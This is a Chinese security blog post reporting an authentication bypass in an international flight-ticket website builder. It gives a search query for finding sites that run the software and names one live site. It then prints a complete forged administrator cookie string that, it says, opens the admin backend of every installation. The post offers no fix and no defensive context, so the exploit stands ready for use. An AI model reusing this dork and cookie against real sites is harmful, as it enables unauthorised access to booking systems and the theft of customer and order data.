某国际机票建站系统权限绕过导致可通杀进入后

时间: 2020-10-11|tag: 18次围观|0 条评论

某国际机票建站系统后台权限绕过导致可进入后台

搜索 inurl:Flight/InternationalTicket.asp

找到约 3,240 条结果 (用时 0.23 秒)

用的人不多,但是也是有一些网站在用的 比如 http://www.tokair.com/
 

某国际机票建站系统权限绕过导致可通杀进入后插图

cookies:
 

AJSTAT_ok_times=2; pgv_pvi=8454968320; AJSTAT_ok_times=3; AJSTAT_ok_pages=1; ASPSESSIONIDCSBRDTCA=LNMNNDMADPIJNFCFLAPAOCEE; GetCode=9375; Admin%5FLoginTime=2013%2D9%2D19+1%3A57%3A37; AdminLevel=1; AdminRight=Manager%5FStaff%5FView%2CManager%5FStaff%5FAdd%2CManager%5FStaff%5FManage%2CManager%5FStaff%5FRight%2CManager%5FMember%5FView%2CManager%5FMember%5FAdd%2CManager%5FMember%5FManage%2CManager%5FMember%5FRight%2CManager%5FLogView%2CManager%5FLogSearch%2CSystem%5FConfig%2CSystem%5FCity%2CSystem%5FFinancial%2CSystem%5FMessage%2CCustom%5FManage%2CCustom%5FAgent%2COrder%5FFlight%5FAdd%2COrder%5FFlight%5FView%2COrder%5FFlight%5FDeal%2COrder%5FFlight%5FManage%2COrder%5FHotel%5FAdd%2COrder%5FHotel%5FView%2COrder%5FHotel%5FDeal%2COrder%5FHotel%5FManage%2COrder%5FTravel%5FAdd%2COrder%5FTravel%5FView%2COrder%5FTravel%5FDeal%2COrder%5FTravel%5FManage%2CNews%5FCenter%2CNews%5FWeb%2CAir%5FCab%2CAir%5FMultiCab%2CAir%5FSpePrice%2CAir%5FInternal%2CAir%5FBack%2CAir%5FMultiBack%2CAir%5FMinPrice%2CAir%5FAirport%2CAir%5FCarrier%2CAir%5FCabVisor%2CAir%5FFlight%2CHotel%5FInfo%2CHotel%5FArea%2CHotel%5FHotCity%2CTour%5FInfo%2CDestination%5FInfo%2CBusiness%5FView%2CBusiness%5FAdd%2CBusiness%5FManage%2CPost%5FView%2CPost%5FAdd%2CPost%5FManage%2COrder%5FFlight%5FManage%5FA%2COrder%5FFlight%5FManage%5FB%2COrder%5FFlight%5FManage%5FP%2COrder%5FFlight%5FManage%5FF%2COrder%5FFlight%5FManage%5FG%2CFlight%5FOrder%5FAdd%2CFlight%5FOrder%5FSearch%2CFlight%5FOrder%5FView%2CFlight%5FOrder%5FDeal%2CFlight%5FOrder%5FEdit%2CFlight%5FOrder%5FDel%2CFlight%5FOrder%5FSL%2CFlight%5FOrder%5FQX%2CFlight%5FOrder%5FHY%2CFlight%5FOrder%5FPay%2CFlight%5FOrder%5FCP%2CFlight%5FOrder%5FPS%2CFlight%5FOrder%5FJS%2CFlight%5FOrder%5FGQ%2CFlight%5FOrder%5FJ%5FS%2CFlight%5FOrder%5FDY%2CSpePrice%5FOrder%5FView%2CSpePrice%5FOrder%5FHandle%2CSystem%5F2%5F1%2CSystem%5F2%5F2%2CSystem%5F2%5F3%2CSystem%5F2%5F10%2CSystem%5F2%5F11%2CSystem%5F2%5F4%2CSystem%5F2%5F6%2CSystem%5F2%5F7%2CSystem%5F2%5F8%2CSystem%5F2%5F9%2CFlightGj%5F1%2CFlightGj%5F5%2CCustom%5FSeach%2CCustom%5FView%2CCustom%5FAdd%2CCustom%5FEdit%2CCustom%5FDel%2CCard%5FImport%2CCard%5FManage%2CUser%5FGrade%5FManage%2CUser%5FJifen%5FManage%2CUser%5FJianyi%2CGife%5F1%2CGife%5F2%2CGife%5F3%2CGife%5F4%2CSystem%5F5%5F1%2CSystem%5F5%5F2%2CSystem%5F5%5F3%2CSystem%5F5%5F4%2CSystem%5F5%5F5%2CPay%5FSuccess%5F1%2CSystem%5F1%5F1%2CSystem%5F1%5F8%2CSystem%5F1%5F9%2CSystem%5F1%5F2%2CSystem%5F1%5F5%2CSystem%5F1%5F4%2CSystem%5F1%5F3%2CSystem%5F1%5F6%2CSystem%5F1%5F7%2CSystem%5F4%5F1%2CSystem%5F4%5F2%2CSystem%5F6%5F1%2CSystem%5F6%5F2%2CSystem%5F6%5F3%2CSystem%5F6%5F4%2CSystem%5F6%5F5%2CSystem%5F6%5F6%2CSystem%5F6%5F7; Admin%5FKeepPass=abc; AdminLogin=abc; Admin%5FConfig=%7C%7C; AdminLocat; Admin%5FUidStr=800639%40XTKIQYS5%40admintrip%40%E7%AE%A1%E7%90%86%E5%91%98; Admin%5Fuid=1068; Time934fdiou22=2013%2D9%2D19+1%3A57%3A40; Time934fdiou=2013%2D9%2D19+1%3A57%3A40

这个cookies具体为什么可以通杀,你们懂得,不多解释呵呵

修改cookies后即可进入后台

部分美图:
 

某国际机票建站系统权限绕过导致可通杀进入后插图1

 

某国际机票建站系统权限绕过导致可通杀进入后插图2

 

某国际机票建站系统权限绕过导致可通杀进入后插图3

 

某国际机票建站系统权限绕过导致可通杀进入后插图4

 

某国际机票建站系统权限绕过导致可通杀进入后插图5

 

某国际机票建站系统权限绕过导致可通杀进入后插图6
    上一篇: 某通用型大学校报发布系统注入漏洞 - 网站安全

    下一篇: Tccms sql注入一枚(绕过防护机制) - 网站安全
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《某国际机票建站系统权限绕过导致可通杀进入后
   

还没有人抢沙发呢~